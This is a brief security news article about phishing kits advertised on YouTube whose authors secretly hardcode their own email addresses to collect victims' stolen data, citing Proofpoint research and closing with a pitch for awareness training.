Scammers are using YouTube videos to advertise phishing templates secretly equipped with backdoors that send stolen information to the authors.
Researchers at security firm Proofpoint found numerous YouTube videos with links to phishing kits and templates. A simple search for “PayPal scama” alone yielded more than 100,000 results.
Each of those videos is designed to illustrate how a template looks and how it collects unsuspecting users’ information. The following advertisement for an Amazon phishing template proves that point:
But there’s more than meets the eye with the video. As the researchers explain in a blog post:
“When we decoded the sample, we found that the author’s Gmail address was hardcoded to receive the results of the phish every time the kit was used, regardless of who used it.
“In this same kit, we also found a secondary email receiving the stolen results. It is unclear if this is the same author as the first or if someone else added it and then redistributed the kit.”
Of course, the kits’ authors don’t want buyers to know they’re absconding with the fruits of their phishing campaigns. They therefore take precautions to avoid raising suspicions.
For instance, with one PayPal phishing kit, the authors hid their secret command behind PHP code that’s been encoded 15 times.
Proofpoint’s researchers found that phishing videos are a persistent problem on YouTube:
“Many of the video samples we found on YouTube have been posted for months, suggesting that YouTube does not have an automated mechanism for detection and removal of these types of videos and links. They remain a free, easy-to-use method for the authors of phishing kits and templates to advertise, demonstrate, and distribute their software.”
It’s up to YouTube to develop better measures that will empower its security teams to stem the tide of these videos.
In the meantime, organizations should take responsibility for educating their workforce about how to spot a phish. They can do so with the help of third-party security awareness training software.
Does that sound of interest to you?